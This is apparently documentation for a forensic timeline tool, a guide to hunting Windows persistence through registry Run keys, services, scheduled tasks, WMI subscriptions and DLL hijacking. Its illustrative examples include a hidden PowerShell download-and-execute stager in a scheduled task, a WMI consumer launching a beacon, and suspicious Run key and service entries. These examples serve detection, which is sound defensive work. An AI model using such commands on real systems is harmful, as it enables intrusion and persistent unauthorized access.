Persistence Hunting

Persistence is one of the most critical phases of an intrusion to identify. Adversaries establish persistence to maintain access across reboots, credential changes, and partial remediation. This guide walks through a systematic approach to hunting for persistence mechanisms using IRFlow Timeline, covering registry run keys, scheduled tasks, services, WMI subscriptions, and DLL hijacking.

Features Used

Persistence Analyzer -- automated detection of 30+ persistence techniques with risk scoring
Search (Regex) -- pattern matching across parsed artifacts
Process Inspector -- trace parent-child relationships for persistence installers
Color Rules -- highlight known persistence paths automatically
Virtual Grid -- sort and filter large artifact sets
Cross-Tab Search -- correlate registry changes with process execution
IOC Matching -- sweep for known-bad indicators in persistence locations

Automated Scan with Persistence Analyzer

1. Run the Persistence Analyzer

Before diving into manual hunting, run the Persistence Analyzer for an automated first pass. Navigate to Tools > Persistence Analyzer and let it auto-detect your data mode (EVTX or Registry).

The analyzer scans for 30+ persistence techniques across services, scheduled tasks, WMI subscriptions, registry autorun keys, and more. Each finding is assigned a risk score (0-10) based on technique severity, suspicious paths, and command-line indicators.

Recommended workflow:

Filter results by Critical and High severity to prioritize the most suspicious findings
Switch to Timeline View to see the chronological order of persistence installations
Use the checkbox selection to bulk-tag high-priority findings in the source timeline
Click any finding to expand its details -- full registry path, command line, timestamp, and user account

Combine Automated and Manual

The Persistence Analyzer catches known patterns quickly, but manual hunting (steps below) is still valuable for uncovering novel techniques, living-off-the-land binaries with unusual arguments, or persistence mechanisms that don't match standard signatures.

Manual Hunting

2. Load RECmd Profile Output

Registry hives are a primary source of persistence artifacts. Before diving in, load the parsed registry output produced by Eric Zimmerman's RECmd using the KAPE module or standalone execution.

Artifact Source	Description
`NTUSER.DAT`	Per-user Run/RunOnce keys, shell folders, startup items
`SOFTWARE`	Machine-wide Run/RunOnce, services, AppInit_DLLs, Winlogon
`SYSTEM`	Services, drivers, Session Manager settings
`AmCache.hve`	Evidence of executable installation and first run

Load the RECmd CSV output into a dedicated tab. See KAPE Integration for automating this step.

3. Set Up Color Rules for Persistence Paths

Before beginning your hunt, configure Color Rules to flag common persistence registry locations automatically. This ensures that relevant entries stand out as you scroll through thousands of registry key-value pairs.

Recommended color rule patterns:

Pattern	Target	Suggested Color
`CurrentVersion\\Run`	Run and RunOnce keys	Red background
`CurrentVersion\\Explorer\\Shell Folders`	Startup folder redirects	Orange background
`\\Services\\`	Service creation and modification	Yellow background
`Winlogon\\`	Winlogon helper DLLs and shell replacement	Red background
`AppInit_DLLs`	DLL injection via AppInit	Red background
`schtasks`	Scheduled task command-line creation	Orange background
`WMI`	WMI event subscriptions	Orange background

TIP

Save your persistence color rule set as a reusable profile. You can export it from the Color Rules panel and reload it for future investigations, ensuring consistent visual triage across cases.

Registry Run Keys

4. Search for Run and RunOnce Entries

Use Search (Regex) to locate all Run and RunOnce registry entries across loaded hives:

CurrentVersion\\(Run|RunOnce)

Review matches carefully. Legitimate entries typically reference well-known paths under C:\Program Files\ or C:\Windows\System32\. Focus on entries pointing to:

Temp directories: C:\Users\<user>\AppData\Local\Temp\
Public profile paths: C:\Users\Public\
Uncommon extensions: .hta, .vbs, .js, .ps1
Obfuscated names: svchost32.exe, csrss64.exe, winupdate.exe

Example of a suspicious Run key value:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    "WindowsSecurityUpdate" = "C:\Users\Public\Downloads\svcmgr.exe -k netsvcs"

5. Check for Service-Based Persistence

Services are a favored persistence mechanism because they run with SYSTEM privileges and start automatically. Search for recently created or modified services:

ControlSet.*\\Services\\.*ImagePath

Suspicious indicators in service entries include:

Indicator	Example
Binary in user-writable path	`C:\ProgramData\updater\beacon.exe`
Misspelled legitimate name	`Spooler1`, `WinDefenderUpdate`
PowerShell in ImagePath	`powershell.exe -enc JABjAGwA...`
`cmd.exe /c` wrapper	`cmd.exe /c C:\Temp\payload.bat`
`svchost.exe -k` with unknown group	Custom ServiceDll in Parameters subkey

6. Trace Service Creation with Process Inspector

When you identify a suspicious service, use the Process Inspector to determine what process created it. Switch to a tab containing process execution data (Sysmon, Windows Security, or MFT timeline) and search for the service name.

Look for services.exe spawning unknown child processes, or sc.exe and reg.exe being invoked by unexpected parents such as cmd.exe launched from winword.exe or outlook.exe.

Scheduled Tasks

7. Search Event Logs for Task Creation

Scheduled task creation is logged by several sources. Load Windows Security and Task Scheduler operational logs and filter for the following Event IDs:

Event ID	Log Source	Description
4698	Security	A scheduled task was created
4702	Security	A scheduled task was updated
106	Task Scheduler Operational	Task registered
200	Task Scheduler Operational	Task execution started
201	Task Scheduler Operational	Task execution completed

8. Identify Suspicious Task Definitions

Use regex search to locate task creation activity:

(schtasks\.exe|4698|TaskScheduler.*106)

Once you find task creation events, examine the XML task definition embedded in Event ID 4698. Pay attention to:

Actions: Commands referencing powershell.exe, mshta.exe, rundll32.exe, cmd.exe, or binaries in non-standard paths
Triggers: Tasks configured with logon triggers, idle triggers, or short repetition intervals (e.g., every 5 minutes)
Principal: Tasks running as SYSTEM or with highest available privileges
Hidden flag: Tasks with <Hidden>true</Hidden> in the XML definition

Example suspicious scheduled task:

Task Name:   \Microsoft\Windows\Maintenance\SystemCleanup
Action:      powershell.exe -w hidden -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://198.51.100.47/stager.ps1')"
Trigger:     At system startup, repeat every 15 minutes
Run As:      SYSTEM

TIP

Adversaries frequently name tasks to blend in with legitimate Windows maintenance tasks. Compare task names against a known-good baseline or search for tasks created during the intrusion timeframe using the Histogram view to spot temporal clusters.

WMI Event Subscriptions

9. Hunt for WMI Persistence

WMI event subscriptions are a stealthy persistence mechanism composed of three components: an Event Filter, an Event Consumer, and a Filter-to-Consumer Binding. Detection relies on:

Event ID	Log Source	Description
5861	WMI-Activity Operational	WMI event subscription created
5859	WMI-Activity Operational	WMI query error (noisy but useful)
Sysmon 19	Sysmon	WmiEventFilter activity
Sysmon 20	Sysmon	WmiEventConsumer activity
Sysmon 21	Sysmon	WmiEventConsumerToFilter activity

Search for WMI subscription creation:

(5861|WmiEvent|ActiveScriptEventConsumer|CommandLineEventConsumer)

A real-world example of malicious WMI persistence:

Filter:     SELECT * FROM __InstanceModificationEvent WITHIN 60
            WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
            AND TargetInstance.SystemUpTime >= 240
Consumer:   CommandLineEventConsumer
            CommandLineTemplate: "cmd.exe /c C:\ProgramData\Microsoft\Crypto\RSA\beacon.exe"
Binding:    Links the filter to the consumer

10. Correlate WMI with Process Execution

Use Cross-Tab Search to pivot from a WMI subscription event in the event log tab to the corresponding process execution in a Sysmon or process tracking tab. Search for the binary referenced in the consumer's command line template across all open tabs.

In the Process Inspector, look for WmiPrvSE.exe spawning unexpected child processes -- this is the telltale sign of a WMI consumer executing its payload.

DLL Search Order Hijacking and Startup Folder

11. Check for DLL Hijacking

DLL search order hijacking involves placing a malicious DLL in a directory searched before the legitimate DLL location. Search for:

(\.dll).*(AppData|ProgramData|Users\\Public|Temp)

Cross-reference any DLL load events (Sysmon Event ID 7) in non-standard directories with the Process Inspector to see which process loaded the DLL and what it subsequently executed.

12. Review Startup Folder Items

Search for references to the Startup folder path:

(Start Menu\\Programs\\Startup|shell:startup)

Also review the Shell Folders registry key for redirected startup paths:

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
    "Startup" = "C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

If the Startup path has been redirected to a non-standard location, this is a strong indicator of tampering.

Consolidation

13. Build a Persistence Summary

After completing the hunt, use Bookmarks and Tags to tag every confirmed persistence mechanism with a persistence tag. Use Stacking on the tagged entries to group by mechanism type (registry, scheduled task, service, WMI).

Build a consolidated view by exporting tagged items via Export Reports. A final persistence summary should include:

Field	Description
Mechanism Type	Registry Run Key, Service, Scheduled Task, WMI, Startup Folder
Path / Key	Full registry path or task name
Payload	Binary path or command line
Persistence Scope	User-level or machine-level
Install Timestamp	When the persistence was established
Installing Process	Parent process that created the mechanism

TIP

Use the persistence install timestamps as pivot points. Search the surrounding five-minute window for lateral movement, credential access, or data staging activity to build a complete attack narrative.

Next Steps

Malware Execution Analysis -- trace what the persisted payload actually did when it ran
Lateral Movement Tracing -- determine how the attacker reached the host where persistence was installed
Threat Intel IOC Sweeps -- match persistence artifacts against known threat intelligence
Ransomware Investigation -- follow the full attack chain when persistence leads to encryption
Building a Final Report -- compile persistence findings into a deliverable report

Persistence Hunting ​

Automated Scan with Persistence Analyzer ​

1. Run the Persistence Analyzer ​

Manual Hunting ​

2. Load RECmd Profile Output ​

3. Set Up Color Rules for Persistence Paths ​

Registry Run Keys ​

4. Search for Run and RunOnce Entries ​

5. Check for Service-Based Persistence ​

6. Trace Service Creation with Process Inspector ​

Scheduled Tasks ​

7. Search Event Logs for Task Creation ​

8. Identify Suspicious Task Definitions ​

WMI Event Subscriptions ​

9. Hunt for WMI Persistence ​

10. Correlate WMI with Process Execution ​

DLL Search Order Hijacking and Startup Folder ​

11. Check for DLL Hijacking ​

12. Review Startup Folder Items ​

Consolidation ​

13. Build a Persistence Summary ​

Next Steps ​